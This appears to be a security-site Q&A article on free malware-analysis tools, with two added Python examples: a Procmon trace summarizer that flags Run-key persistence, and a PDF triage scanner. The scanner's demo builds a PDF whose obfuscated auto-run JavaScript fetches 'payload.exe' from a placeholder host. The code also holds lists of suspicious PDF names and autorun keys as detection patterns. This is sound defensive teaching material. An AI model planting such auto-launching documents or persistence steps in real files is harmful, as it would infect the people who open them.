
What are the best antimalware tools for enterprise use?

Antimalware is a critical enterprise defense. Threats expert Nick Lewis discusses the best free antimalware tools to use in your organization.

I recently watched Keith Barker's demonstration on how to detect malware with different features of the free REMnux tool. Do you have any other free antimalware tools you'd suggest using to find malware on infected machines?

One of the best places to find free information security tools is SecTools.org's Top 125 Security Tools list, which rates both antimalware tools and rootkit detectors and is periodically updated based on feedback from the information security community. SANS also publishes a short primer on malware analysis that lists additional tools. Note, however, that many of these tools require significant knowledge of the systems under investigation, so it is best to become familiar with them in a lab setting before relying on them in the field.

I have found that some of the most useful tools for beginners conducting malware analysis are the Windows Sysinternals tools. Security teams should always run malware on a dedicated, isolated test system, because executing a sample will infect that system. Organizations can do this in a virtual machine, but some advanced malware detects that it is running in a VM and then behaves differently, or not at all, so "nothing happened" in a VM is not proof that a sample is benign. Sysinternals' older Filemon and Regmon utilities, which monitored file and registry access respectively, have been retired and folded into Process Monitor (Procmon), which records file, registry, process and network activity in a single trace that can be filtered down to the suspect process. By watching which files a sample writes and which registry values it sets (autorun keys under HKCU\Software\Microsoft\Windows\CurrentVersion\Run are a common persistence target), you get a concrete picture of what it does on the system. You can then use Process Explorer to take a more in-depth look at the processes the malware spawns, including their parent/child relationships, loaded DLLs and open handles.
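To show what "monitoring file and registry access" yields in practice, here is an added example (not code from this article or from Sysinternals) that reads a Procmon CSV export and reports, for one process, the files it wrote, the registry values it set and its network connections, then cross-references Run-key values against files the same process wrote, the classic drop-then-register persistence pattern. The column names are Procmon's default export layout; the sample rows are constructed for the demo and are not real telemetry.

```python
"""Summarize a Process Monitor (Procmon) CSV export for one suspect process.

Added example for this article, not Sysinternals code. It assumes the export
uses Procmon's default column set ("Time of Day","Process Name","PID",
"Operation","Path","Result","Detail"); the rows below are constructed for
the demo, not real telemetry.
"""
import csv
import io
import re
from collections import defaultdict

# Constructed Procmon export: a phishing "invoice" drops a fake svchost.exe
# into the user's roaming profile, registers it under the Run key, fingerprints
# the host and phones home.  The explorer.exe row is ordinary background noise.
SAMPLE_CSV = '''\
"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"10:02:13.0010","invoice.exe","4120","CreateFile","C:\\Users\\analyst\\AppData\\Roaming\\svchost.exe","SUCCESS","Desired Access: Generic Write"
"10:02:13.0020","invoice.exe","4120","WriteFile","C:\\Users\\analyst\\AppData\\Roaming\\svchost.exe","SUCCESS","Offset: 0, Length: 212,992"
"10:02:13.0030","invoice.exe","4120","RegSetValue","HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Updater","SUCCESS","Type: REG_SZ, Data: C:\\Users\\analyst\\AppData\\Roaming\\svchost.exe"
"10:02:13.0040","invoice.exe","4120","RegQueryValue","HKLM\\SOFTWARE\\Microsoft\\Cryptography\\MachineGuid","SUCCESS","Type: REG_SZ"
"10:02:13.0050","invoice.exe","4120","TCP Connect","host-a.local:49712 -> 203.0.113.7:443","SUCCESS","Length: 0"
"10:02:14.0000","explorer.exe","1832","RegQueryValue","HKCU\\Software\\Classes\\Local Settings\\MuiCache","SUCCESS","Type: REG_SZ"
"10:02:14.0100","invoice.exe","4120","CreateFile","C:\\Windows\\System32\\kernel32.dll","SUCCESS","Desired Access: Read Data"
'''

# Run / RunOnce keys under any hive or user profile (case-insensitive).
AUTORUN_KEY = re.compile(r"\\Microsoft\\Windows\\CurrentVersion\\(Run|RunOnce)\\", re.I)


def parse_procmon_csv(text):
    """Parse a Procmon CSV export into a list of dicts keyed by column name."""
    return list(csv.DictReader(io.StringIO(text)))


def summarize_process(rows, process_name):
    """Group one process's activity by category.

    Returns sorted lists so the output is deterministic and can be diffed
    against a trace of the same sample on a clean baseline image.
    """
    files, keys, net = set(), set(), set()
    for r in rows:
        if r["Process Name"].lower() != process_name.lower():
            continue
        op, path = r["Operation"], r["Path"]
        if op == "WriteFile":
            files.add(path)
        elif op in ("RegSetValue", "RegCreateKey"):
            keys.add(path)
        elif op.startswith(("TCP ", "UDP ")):
            net.add(path)
    return {
        "files_written": sorted(files),
        "registry_written": sorted(keys),
        "network": sorted(net),
    }


def find_persistence(rows):
    """Flag Run/RunOnce values whose data points at a file the same process
    wrote earlier in the capture: drop a payload, then register it to start
    at logon."""
    written_by = defaultdict(set)
    for r in rows:
        if r["Operation"] == "WriteFile":
            written_by[r["Process Name"]].add(r["Path"].lower())
    hits = []
    for r in rows:
        if r["Operation"] != "RegSetValue" or not AUTORUN_KEY.search(r["Path"]):
            continue
        # Procmon puts the written value in Detail as "Type: REG_SZ, Data: ..."
        m = re.search(r"Data: (.+)$", r["Detail"])
        target = m.group(1).strip().strip('"').lower() if m else ""
        hits.append({
            "process": r["Process Name"],
            "key": r["Path"],
            "target": target,
            "dropped_by_same_process": target in written_by[r["Process Name"]],
        })
    return hits


if __name__ == "__main__":
    rows = parse_procmon_csv(SAMPLE_CSV)
    print(summarize_process(rows, "invoice.exe"))
    for hit in find_persistence(rows):
        print(hit)
```

In real use, export the filtered trace from Procmon (File > Save, CSV format) and feed that file to `parse_procmon_csv`; run the same sample against a clean baseline trace so that normal Windows noise (MuiCache lookups, DLL loads from System32) can be subtracted from the summary.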

There are two basic types of tools that can be used to find malware on an infected machine: one set looks for known malicious signatures or behavior, while the other is for an advanced user to investigate in depth and identify advanced malware that the first set missed. Signature- or behavior-based scanners are typically the commercial products from McAfee, Symantec and others, or open source tools such as ClamAV; they are quick to run but only find what they already have a signature or heuristic for. The advanced tools are usually highly customizable or are general-purpose toolkits that take significant effort to use well, such as the Microsoft Sysinternals suite.

There are other tools for analyzing potentially malicious files that help reverse engineer the details of a file used in an attack: Immunity Debugger can be used to analyze an executable, and Wireshark can analyze the network traffic the malware generates. There are also tools that analyze PDF or Word documents to identify the URLs or hosts they contact on the Internet and to determine whether they contain embedded JavaScript or other potentially malicious code. Those indicators (hosts, URLs, dropped files) are what you need in order to put other security controls in place or update existing ones, such as web proxy or DNS blocklists.
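For the document-analysis step, here is an added example (not code from this article or from any tool it names) of the core check a PDF triage tool performs: it counts risky PDF names such as /JavaScript, /OpenAction and /Launch after undoing the #xx hex escapes attackers use to hide them, inflates any FlateDecode streams it can so that script bodies hidden inside compressed objects are scanned too, and extracts URLs from both. The sample PDF is constructed inside the script; example.invalid is a reserved placeholder domain.

```python
"""Static triage of a PDF: suspicious name objects, inflated streams, URLs.

Added example for this article, not the code of any named tool. The sample
document is constructed below for the demo and is not a real malicious file.
"""
import re
import zlib

# PDF name objects may hex-escape any character (/J#61vaScript == /JavaScript);
# malware uses this to dodge naive string matching, so undo it before scanning.
NAME_HEX = re.compile(rb"#([0-9A-Fa-f]{2})")
# Names whose presence warrants a closer look. /AA = additional actions.
SUSPICIOUS = [b"/JavaScript", b"/JS", b"/OpenAction", b"/AA", b"/Launch",
              b"/EmbeddedFile", b"/RichMedia", b"/URI"]
# "stream ... endstream" bodies; the lookbehind keeps "endstream" from being
# mistaken for the start of a new stream.
STREAM = re.compile(rb"(?<!end)stream\r?\n(.*?)endstream", re.S)
URL = re.compile(rb"https?://[^\s()'\"<>]+")


def normalize_names(data):
    """Replace #xx escapes with the byte they encode."""
    return NAME_HEX.sub(lambda m: bytes([int(m.group(1), 16)]), data)


def inflate_streams(data):
    """Yield the decompressed body of every stream that is valid zlib data.

    A decompressobj is used so the trailing newline before 'endstream' is
    treated as unused data instead of an error; non-Flate streams are skipped.
    """
    for m in STREAM.finditer(data):
        try:
            d = zlib.decompressobj()
            yield d.decompress(m.group(1)) + d.flush()
        except zlib.error:
            continue


def triage_pdf(data):
    """Return keyword counts, URLs and the number of streams inflated."""
    views = [normalize_names(data)]
    inflated = [normalize_names(body) for body in inflate_streams(data)]
    views.extend(inflated)
    counts = {}
    for kw in SUSPICIOUS:
        # Negative lookahead so /JS does not also count /JSX-style names.
        pat = re.compile(re.escape(kw) + rb"(?![A-Za-z0-9])")
        counts[kw.decode()] = sum(len(pat.findall(v)) for v in views)
    urls = sorted({u.decode("latin-1") for v in views for u in URL.findall(v)})
    return {"keywords": counts, "urls": urls, "streams_inflated": len(inflated)}


def build_sample_pdf():
    """Construct a tiny malicious-looking PDF for the demo (not a real sample):
    /OpenAction fires a hex-obfuscated /J#61vaScript action, a link annotation
    carries a /URI, and the script body is hidden in a FlateDecode stream."""
    js_body = b"app.launchURL('http://example.invalid/payload.exe');"
    compressed = zlib.compress(js_body)
    return b"".join([
        b"%PDF-1.4\n",
        b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >> endobj\n",
        b"2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj\n",
        b"3 0 obj << /Type /Page /Parent 2 0 R /Annots [5 0 R] >> endobj\n",
        b"4 0 obj << /S /J#61vaScript /JS 6 0 R >> endobj\n",
        b"5 0 obj << /Type /Annot /Subtype /Link /A << /S /URI "
        b"/URI (http://example.invalid/login) >> >> endobj\n",
        b"6 0 obj << /Length " + str(len(compressed)).encode()
        + b" /Filter /FlateDecode >>\nstream\n",
        compressed,
        b"\nendstream\nendobj\n",
        b"trailer << /Root 1 0 R >>\n%%EOF\n",
    ])


if __name__ == "__main__":
    report = triage_pdf(build_sample_pdf())
    for name, n in report["keywords"].items():
        if n:
            print(f"{name:<14} {n}")
    print("URLs:", report["urls"])
    print("streams inflated:", report["streams_inflated"])
```

A document with /OpenAction or /AA plus /JavaScript or /Launch is worth detonating in the isolated lab; the URLs and hosts the script recovers are the indicators to hand to the people who run the proxy and DNS controls. This is a triage heuristic, not a verdict: object streams, other filters such as LZW, and malformed files that readers still tolerate can all hide content from a scan this simple.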


This was last published in October 2014
